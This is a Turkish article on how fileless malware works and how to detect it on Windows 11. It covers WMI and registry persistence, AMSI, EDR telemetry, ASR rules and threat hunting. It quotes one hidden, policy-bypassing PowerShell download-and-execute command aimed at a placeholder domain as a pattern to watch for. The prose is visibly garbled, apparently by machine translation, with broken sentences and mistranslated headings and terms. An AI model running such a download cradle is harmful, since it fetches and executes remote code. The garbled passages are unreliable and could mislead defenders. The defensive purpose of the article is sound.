Windows 11'de tehlikeli dosyasız kötü amaçlı yazılımlar nasıl tespit edilir?

¿Tehlikeli dosyasız kötü amaçlı yazılımlar nasıl tespit edilir? Dosyasız saldırı etkinliği önemli ölçüde arttı ve daha da kötüsü, Windows 11 de bundan muaf değilBu yaklaşım, diski atlayıp belleğe ve meşru sistem araçlarına güvenir; imza tabanlı antivirüs programlarının zorlanmasının nedeni budur. Bunu tespit etmenin güvenilir bir yolunu arıyorsanız, cevap, telemetri, davranış analizi ve Windows denetimleri.

Mevcut ekosistemde, PowerShell, WMI veya Mshta'yı kötüye kullanan kampanyalar, bellek enjeksiyonları, diske "dokunmadan" kalıcılık ve hatta aygıt yazılımı suistimalleriÖnemli olan tehdit haritasını, saldırı aşamalarını ve her şey RAM içerisinde gerçekleşse bile hangi sinyalleri bıraktıklarını anlamaktır.

Dosyasız kötü amaçlı yazılım nedir ve Windows 11'de neden bir endişe kaynağıdır?

"Dosyasız" tehditlerden bahsettiğimizde, kötü amaçlı kodlardan bahsediyoruz. Yeni yürütülebilir dosyalar yüklemenize gerek yok Dosya sisteminde çalışmak için. Genellikle çalışan işlemlere eklenir ve RAM'de yürütülür, Microsoft tarafından imzalanmış yorumlayıcılara ve ikili dosyalara güvenir (örneğin, PowerShell, WMI, rundll32, mshtaBu, ayak izinizi azaltır ve yalnızca şüpheli dosyaları arayan motorları atlamanıza olanak tanır.

Hatta komutları başlatmak için güvenlik açıklarından yararlanan ofis belgeleri veya PDF'ler bile bu olgunun bir parçası olarak kabul ediliyor, çünkü bellekte yürütmeyi etkinleştir Analiz için yararlı ikili dosyalar bırakmadan. makrolar ve DDE Office'te kod WinWord gibi meşru süreçlerde çalıştığı için.

Saldırganlar sosyal mühendisliği (kimlik avı, spam bağlantıları) teknik tuzaklarla birleştirir: Kullanıcının tıklaması, bir betiğin bellekteki son yükü indirip çalıştırdığı bir zinciri başlatır, iz bırakmaktan kaçınmak Diskte. Amaçlar veri hırsızlığından fidye yazılımı çalıştırmaya ve sessiz yatay harekete kadar uzanıyor.

Sistemdeki ayak izine göre tipolojiler: 'saf'tan hibritlere

Kavramların kafa karıştırmasını önlemek için, tehditleri dosya sistemiyle etkileşim derecelerine göre ayırmak faydalıdır. Bu kategorilendirme, Neler kalıcıdır, kod nerede yaşar ve hangi işaretleri bırakır?.

Tip I: dosya etkinliği yok

Tamamen dosyasız kötü amaçlı yazılımlar diske hiçbir şey yazmaz. Klasik bir örnek, bir ağ güvenlik açığı (eskiden EternalBlue vektörü gibi) çekirdek belleğinde bulunan bir arka kapıyı uygulamak için (DoublePulsar gibi durumlar). Burada her şey RAM'de gerçekleşir ve dosya sisteminde hiçbir eser yoktur.

Başka bir seçenek de kirletmektir firmware BIOS/UEFI, ağ bağdaştırıcıları, USB çevre birimleri (BadUSB tipi teknikler) veya hatta CPU alt sistemleri gibi bileşenler. Yeniden başlatmalar ve yeniden yüklemeler sırasında kalıcı olurlar ve bu da ek bir zorluk yaratır. Birkaç ürün donanım yazılımını denetlerBunlar karmaşık, daha az sıklıkta gerçekleşen, ancak gizlilikleri ve dayanıklılıkları nedeniyle tehlikeli saldırılardır.

Tip II: Dolaylı arşivleme faaliyeti

Burada kötü amaçlı yazılım kendi yürütülebilir dosyasını "bırakmaz", bunun yerine esasen dosya olarak depolanan sistem tarafından yönetilen kapsayıcıları kullanır. Örneğin, powershell komutları WMI deposunda depolanır ve olay filtreleriyle yürütülmesi tetiklenir. İkili dosyaları silmeden komut satırından yüklemek mümkündür, ancak WMI deposu diskte meşru bir veritabanı olarak bulunduğundan, sistemi etkilemeden temizlenmesi zordur.

Pratik açıdan bakıldığında, dosyasız olarak kabul edilirler, çünkü bu kapsayıcı (WMI, Kayıt Defteri, vb.) Bu klasik bir algılanabilir yürütülebilir dosya değil Ve temizlenmesi hiç de kolay değil. Sonuç: "geleneksel" izlere çok az yer veren gizli bir ısrar.

Tip III: Çalışması için dosyalara ihtiyaç duyar

Bazı vakalar bir 'dosyasız' kalıcılık Mantıksal düzeyde, dosya tabanlı bir tetikleyiciye ihtiyaç duyarlar. Tipik bir örnek Kovter'dir: rastgele bir uzantı için bir kabuk fiili kaydeder; bu uzantıya sahip bir dosya açıldığında, mshta.exe kullanan küçük bir betik başlatılır ve bu betik, Kayıt Defteri'ndeki kötü amaçlı dizeyi yeniden oluşturur.

İşin püf noktası, rastgele uzantılara sahip bu "yem" dosyalarının analiz edilebilir bir yük içermemesi ve kodun büyük kısmının kayıt (başka bir kapsayıcı). Bu nedenle, tetikleyici olarak bir veya daha fazla disk eserine bağlı olmalarına rağmen, etki açısından dosyasız olarak sınıflandırılırlar.

Enfeksiyon vektörleri ve 'konakçıları': Nereden giriyor ve nerede saklanıyor?

Tespiti iyileştirmek için, giriş noktasını ve enfeksiyonun taşıyıcısını haritalamak hayati önem taşır. Bu bakış açısı, tasarımın geliştirilmesine yardımcı olur. özel kontroller Uygun telemetriye öncelik verin.

patlatır

• Dosya tabanlı (Tip III): Belgeler, yürütülebilir dosyalar, eski Flash/Java dosyaları veya LNK dosyaları, kabuk kodunu belleğe yüklemek için tarayıcıyı veya bunları işleyen motoru kullanabilir. İlk vektör bir dosyadır, ancak yük RAM'e gider.
• Ağ tabanlı (Tip I): Bir güvenlik açığından (örneğin SMB'de) yararlanan bir paket, kullanıcı alanında veya çekirdekte yürütülür. WannaCry bu yaklaşımı popülerleştirdi. Doğrudan bellek yüklemesi yeni dosya olmadan.

donanım

• Cihazlar (Tip I): Disk veya ağ kartı yazılımı değiştirilebilir ve kod eklenebilir. Denetlenmesi zordur ve işletim sistemi dışında da varlığını sürdürür.
• CPU ve yönetim alt sistemleri (Tip I): Intel'in ME/AMT gibi teknolojiler, İşletim sistemi dışında ağ oluşturma ve yürütmeÇok düşük seviyede saldırır, yüksek gizlilik potansiyeline sahiptir.
• USB (Tip I): BadUSB, bir USB sürücüsünü klavye veya NIC gibi davranacak ve komutları başlatacak veya trafiği yönlendirecek şekilde yeniden programlamanıza olanak tanır.
• BIOS / UEFI (Tip I): Windows başlatılmadan önce çalışan kötü amaçlı yazılım yeniden programlama (Mebromi gibi durumlar).
• Hiper yönetici (Tip I): İşletim sisteminin varlığını gizlemek için işletim sisteminin altına bir mini hipervizör yerleştirmek. Nadirdir, ancak hipervizör kök setleri şeklinde zaten gözlemlenmiştir.

İnfaz ve enjeksiyon

• Dosya tabanlı (Tip III): Meşru işlemlere enjeksiyon başlatan EXE/DLL/LNK veya zamanlanmış görevler.
• Makrolar (Tip III): Office'teki VBA, aldatma yoluyla kullanıcının izniyle tam fidye yazılımı da dahil olmak üzere yükleri çözebilir ve çalıştırabilir.
• Scripts (Tip II): Dosyadan, komut satırından PowerShell, VBScript veya JScript, hizmetler, Kayıt veya WMISaldırgan, diske dokunmadan uzak bir oturumda betiği yazabilir.
• Önyükleme kaydı (MBR/Önyükleme) (Tip II): Petya gibi aileler, başlangıçta kontrolü ele geçirmek için önyükleme sektörünün üzerine yazar. Dosya sisteminin dışındadır, ancak işletim sistemi tarafından erişilebilir ve onu geri yükleyebilen modern çözümler mevcuttur.

Dosyasız saldırılar nasıl çalışır: aşamalar ve sinyaller

Yürütülebilir dosyalar bırakmasalar da kampanyalar aşamalı bir mantığı takip eder. Bunları anlamak, izlemeyi mümkün kılar. olaylar ve süreçler arasındaki ilişkiler iz bırakan.

• İlk erişimBağlantılar veya ekler, ele geçirilmiş web siteleri veya çalınmış kimlik bilgileri kullanılarak yapılan kimlik avı saldırıları. Birçok zincir, bir komutu tetikleyen bir Office belgesiyle başlar. PowerShell.
• Kalıcılık: WMI üzerinden arka kapılar (filtreler ve abonelikler), Kayıt yürütme anahtarları veya yeni bir kötü amaçlı dosya olmadan komut dosyalarını yeniden başlatan zamanlanmış görevler.
• SızmaBilgiler toplandıktan sonra trafiği karıştırmak için güvenilir süreçler (tarayıcılar, PowerShell, bitsadmin) kullanılarak ağ dışına gönderilir.

Bu desen özellikle sinsi çünkü saldırı göstergeleri Bunlar normalliğin içinde gizlenir: komut satırı argümanları, işlem zincirlemeleri, anormal giden bağlantılar veya enjeksiyon API'lerine erişim.

Yaygın teknikler: hafızadan kayda

Oyuncular bir dizi güce güveniyor yöntemleri gizliliği optimize eden. Etkili tespiti etkinleştirmek için en yaygın olanları bilmek faydalıdır.

• Anısına ikamet eden: Aktivasyon bekleyen güvenilir bir sürecin alanına yüklerin yüklenmesi. rootkit'ler ve kancalar Çekirdekte gizlilik seviyesini yükseltiyorlar.
• Kayıt Defterinde KalıcılıkŞifrelenmiş dosyaları anahtarlara kaydedin ve bunları meşru bir başlatıcıdan (mshta, rundll32, wscript) yeniden kullanın. Geçici yükleyici, ayak izini en aza indirmek için kendini imha edebilir.
• Kimlik bilgisi dolandırıcılığıSaldırgan, çalınan kullanıcı adları ve parolaları kullanarak uzak kabukları çalıştırır ve sessiz erişim Kayıt Defterinde veya WMI'da.
• 'Dosyasız' Fidye YazılımıŞifreleme ve C2 iletişimi RAM'den düzenleniyor ve bu sayede hasar görünür hale gelene kadar tespit edilme şansı azalıyor.
• Ameliyat kitleri: Kullanıcı tıkladıktan sonra güvenlik açıklarını tespit eden ve yalnızca belleğe yük bindiren otomatik zincirler.
• Kodlu belgeler: yürütülebilir dosyaları diske kaydetmeden komutları tetikleyen DDE gibi makrolar ve mekanizmalar.

Sektör araştırmaları zaten kayda değer zirveler gösterdi: 2018'in bir döneminde, %90'ın üzerinde artış Betik tabanlı ve PowerShell zincir saldırılarında, vektörün etkinliği nedeniyle tercih edildiğinin bir işaretidir.

Şirketler ve tedarikçiler için zorluk: Engellemenin neden yeterli olmadığı

PowerShell'i devre dışı bırakmak veya makroları sonsuza dek yasaklamak cazip gelebilir, ancak Operasyonu bozardınPowerShell modern yönetimin bir direğidir ve Office iş dünyasının olmazsa olmazıdır; onu körü körüne engellemek çoğu zaman uygulanabilir değildir.

Ayrıca, temel denetimleri atlamanın yolları da vardır: PowerShell'i DLL'ler ve rundll32 aracılığıyla çalıştırmak, komut dosyalarını EXE'lere paketlemek, Kendi PowerShell kopyanızı getirin veya hatta görsellere komut dosyaları gizleyip hafızaya almak. Dolayısıyla savunma, yalnızca araçların varlığını inkar etmeye dayandırılamaz.

Yaygın bir diğer hata ise tüm kararı buluta devretmektir: Aracının sunucudan bir yanıt beklemesi gerekiyorsa, Gerçek zamanlı önlemeyi kaybedersinizTelemetri verileri, bilgiyi zenginleştirmek için yüklenebilir, ancak Azaltma, son noktada gerçekleşmelidir.

Windows 11'de dosyasız kötü amaçlı yazılımlar nasıl tespit edilir: telemetri ve davranış

Kazanan strateji şudur: süreçleri ve belleği izlemekDosyalar değil. Kötü amaçlı davranışlar, bir dosyanın aldığı formlardan daha kararlıdır ve bu da onları önleme motorları için ideal hale getirir.

• AMSI (Kötü Amaçlı Yazılım Tarama Arayüzü)Bellekte dinamik olarak oluşturulmuş olsalar bile PowerShell, VBScript veya JScript betiklerini yakalar. Çalıştırılmadan önce gizlenmiş dizeleri yakalamak için mükemmeldir.
• Süreç izleme: başlangıç/bitiş, PID, ebeveynler ve çocuklar, rotalar, komut satırları ve karmalar, ayrıca hikayenin tamamını anlamak için yürütme ağaçları.
• Bellek analizi: Diske dokunmadan enjeksiyonların, yansıtıcı veya PE yüklerinin tespiti ve olağandışı yürütülebilir bölgelerin incelenmesi.
• Başlangıç ​​sektörü koruması: MBR/EFI'nin kurcalanması durumunda kontrolü ve onarılması.

Microsoft ekosisteminde, Defender for Endpoint, AMSI'yi birleştirir. davranış izlemeYeni veya gizlenmiş varyantlara karşı tespitleri ölçeklendirmek için bellek taraması ve bulut tabanlı makine öğrenimi kullanılır. Diğer tedarikçiler de çekirdekte yerleşik motorlarla benzer yaklaşımlar kullanır.

Gerçekçi bir korelasyon örneği: belgeden PowerShell'e

Outlook'un bir eki indirdiği, Word'ün belgeyi açtığı, etkin içeriğin etkinleştirildiği ve PowerShell'in şüpheli parametrelerle başlatıldığı bir zincir düşünün. Uygun telemetri, Komut satırı (örneğin, ExecutionPolicy Bypass, gizli pencere), güvenilmeyen bir etki alanına bağlanarak AppData'ya kendini yükleyen bir alt işlem oluşturma.

Yerel bağlamı olan bir aracı şunları yapabilir: dur ve geri git SIEM'e veya e-posta/SMS yoluyla bildirimde bulunmanın yanı sıra, manuel müdahale olmaksızın kötü amaçlı faaliyetleri tespit etmek mümkündür. Bazı ürünler, görünür sürece (Outlook/Word) değil, mevcut sürece işaret eden bir kök neden atıf katmanı (StoryLine tipi modeller) ekler. tam kötü niyetli konu ve kökeni sistemin kapsamlı bir şekilde temizlenmesidir.

Dikkat etmeniz gereken tipik bir komut düzeni şöyle görünebilir: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Mantık tam olarak aynı dize değil, ama sinyal kümesi: politika atlama, gizli pencere, indirmeyi temizleme ve bellek içi yürütme.

AMSI, boru hattı ve her aktörün rolü: uç noktadan SOC'ye

Komut dosyası yakalamanın ötesinde, sağlam bir mimari, araştırma ve müdahaleyi kolaylaştıran adımları düzenler. Yüklemeyi yapmadan önce ne kadar çok kanıt olursa o kadar iyi.Daha iyi.

• Senaryo kesintisiAMSI, içeriği (anında üretilmiş olsa bile) statik ve dinamik analiz için kötü amaçlı yazılım boru hattında sunar.
• İşlem olaylarıPID'ler, ikili dosyalar, karmalar, rotalar ve diğer veriler toplanır. argümanlar, son yüklemeye yol açan işlem ağaçlarını kurarak.
• Tespit ve raporlamaAlgılamalar ürün konsolunda görüntülenir ve kampanya görselleştirmesi için ağ platformlarına (NDR) iletilir.
• Kullanıcı garantileriBir betik belleğe enjekte edilse bile, çerçeve AMSI bunu yakalar Windows'un uyumlu sürümlerinde.
• Yönetici yetenekleri: betik incelemesini etkinleştirmek için politika yapılandırması, davranışa dayalı engelleme ve konsoldan raporlar oluşturma.
• SOC çalışması: Geçmişi yeniden oluşturmak için yapıtların (VM UUID, işletim sistemi sürümü, betik türü, başlatıcı işlem ve onun üst öğesi, karmalar ve komut satırları) çıkarılması asansör kuralları gelecek.

Platform, dışa aktarmaya izin verdiğinde bellek tamponu İnfazla ilişkili olarak araştırmacılar yeni tespitler üretebilir ve benzer varyantlara karşı savunmayı zenginleştirebilirler.

Windows 11'de pratik önlemler: önleme ve avlanma

Bellek denetimi ve AMSI ile EDR'ye ek olarak, Windows 11 saldırı alanlarını kapatmanıza ve görünürlüğü iyileştirmenize olanak tanır yerel kontroller.

• PowerShell'de kayıt ve kısıtlamalarKomut Dosyası Blok Günlüğünü ve Modül Günlüğünü etkinleştirir, mümkün olan yerlerde kısıtlı modları uygular ve kullanımını kontrol eder Baypas/Gizli.
• Saldırı Yüzeyi Azaltma (ASR) Kuralları: Office süreçleri tarafından başlatılan komut dosyalarını engeller ve WMI kötüye kullanımıGerekmediğinde /PSExec.
• Ofis makro politikaları: varsayılan olarak dahili makro imzalamayı ve sıkı güven listelerini devre dışı bırakır; eski DDE akışlarını izler.
• WMI Denetim ve Kayıt: olay aboneliklerini ve otomatik yürütme anahtarlarını (Run, RunOnce, Winlogon) ve görev oluşturmayı izler planlanmış.
• Başlangıç ​​koruması: Güvenli Önyüklemeyi etkinleştirir, MBR/EFI bütünlüğünü kontrol eder ve başlangıçta herhangi bir değişiklik olmadığını doğrular.
• Yama ve sertleştirme: tarayıcılarda, Office bileşenlerinde ve ağ hizmetlerinde istismar edilebilir güvenlik açıklarını kapatır.
• farkındalık: kullanıcıları ve teknik ekipleri kimlik avı ve sinyaller konusunda eğitir gizli infazlar.

Avcılık için, şu konulara odaklanın: Office tarafından PowerShell/MSHTA'ya yönelik süreçler oluşturma, argümanlar indirme dizesi/indirme dosyasıŞüpheli TLD'lere yönelik net karartma, yansıtıcı enjeksiyonlar ve giden ağlar içeren betikler. Gürültüyü azaltmak için bu sinyalleri itibar ve sıklık ile çapraz referanslayın.

Günümüzde her motor neyi tespit edebiliyor?

Microsoft'un kurumsal çözümleri AMSI, davranışsal analizleri bir araya getiriyor hafızayı incelemek ve önyükleme sektörü korumasının yanı sıra, ortaya çıkan tehditlere karşı ölçeklenebilen bulut tabanlı makine öğrenimi modelleri. Diğer tedarikçiler, değişikliklerin otomatik olarak geri alınmasıyla kötü amaçlı yazılımları iyi niyetli yazılımlardan ayırmak için çekirdek düzeyinde izleme uygular.

Temelinde bir yaklaşım infaz hikayeleri Kök nedeni (örneğin, bir zinciri tetikleyen bir Outlook eki) belirlemenize ve tüm ağacı (betikler, anahtarlar, görevler ve ara ikili dosyalar) hafifletmenize olanak tanır; böylece görünür belirtiye takılıp kalmaktan kaçınırsınız.

Yaygın hatalar ve bunlardan nasıl kaçınılacağı

Alternatif bir yönetim planı olmadan PowerShell'i engellemek yalnızca pratik değildir, aynı zamanda dolaylı olarak çağırmanın yollarıAynı şey makrolar için de geçerli: Ya onları politikalar ve imzalarla yönetirsiniz, ya da işletmeniz zarar görür. Telemetri ve davranış kurallarına odaklanmak daha iyidir.

Yaygın bir diğer hata ise uygulamaları beyaz listeye almanın her şeyi çözeceğine inanmaktır: dosyasız teknoloji tam da buna dayanır. güvenilir uygulamalarKontrol, sadece izin verilip verilmediğini değil, ne yaptıklarını ve nasıl ilişki kurduklarını da gözlemlemelidir.

Yukarıdakilerin hepsiyle birlikte, gerçekten önemli olanı izlediğinizde dosyasız kötü amaçlı yazılımlar "hayalet" olmaktan çıkar: davranış, hafıza ve kökenler Her yürütmenin. AMSI, zengin işlem telemetrisi, yerel Windows 11 kontrolleri ve davranışsal analiz içeren bir EDR katmanını birleştirmek size avantaj sağlar. Denkleme, makrolar ve PowerShell için gerçekçi politikalar, WMI/Kayıt Defteri denetimi ve komut satırlarına ve işlem ağaçlarına öncelik veren avlanmayı da eklerseniz, bu zincirler ses çıkarmadan önce onları kesen bir savunmaya sahip olursunuz.